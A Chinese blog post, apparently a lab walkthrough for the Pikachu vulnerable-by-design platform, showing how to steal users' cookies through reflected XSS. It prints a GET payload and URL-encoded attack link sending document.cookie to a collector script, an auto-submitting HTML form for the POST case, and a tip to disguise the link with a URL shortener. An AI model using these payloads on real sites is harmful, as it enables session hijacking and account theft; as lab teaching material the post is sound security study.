欢迎来到赛兔子家园

利用Pikachu管理工具中XSS后台获取用户

如何利用XSS漏洞,获取用户cookie信息

使用Pikachu Xss后台来获取被攻击用户的cookie。

Pikachu Xss获取cookies结果列表:

反射型xss(get)获取用户的cookie

Pikachu中反射型xss(get)为例:

payload :<script>document.location='http://192.168.10.7:85/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

location参数的值必须填写Pikachu漏洞管理工具中cookie.php文件的路径。

文本框中输入后,将构造的url发给被攻击用户,用户点击后即可在xss后台获取用户的cookies信息。

构造攻击url:http://192.168.10.7:85/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.10.7%3A85%2Fpikachu-master%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit

将次url发送给其它pikachu用户,这里的ip为内网ip,若是部署在公网上ip修改为公网ip即可。

构造的url太长很容易让人看出来,可以使用:https://dwz.51.la/将长链接转换为短链接。

攻击:

通过各种路径将构造的url发给不攻击用户,当用户点击链接后。在Pikachu Xss后台查看cookies结果列表中生成该用户的cookies信息:

反射型xss(post)为例:

payload : 

postxss.html

<html>
<head>
<script>
window.onload = function(){
    document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.10.7:85/pikachu-master/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xss_in" type="text" name="message" value="<script>document.location='http://192.168.10.7:85/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>" />
    <input id="postsubmit" type="submit" name="submit" value="submit"/>
</form>
</body>
</html>

攻击:

将postxss.html部署到自己的服务器上:

例如:http://192.168.10.7:85/postxss.html,将该url发送给已经登录到Pikachu中的用户,这里必须已经登录到xss(post)中的用户,该用户点击后xss后台获取到cookies信息

 

posted on 2020-08-01 14:35  赛兔子  阅读(1116)  评论(0编辑  收藏  举报

导航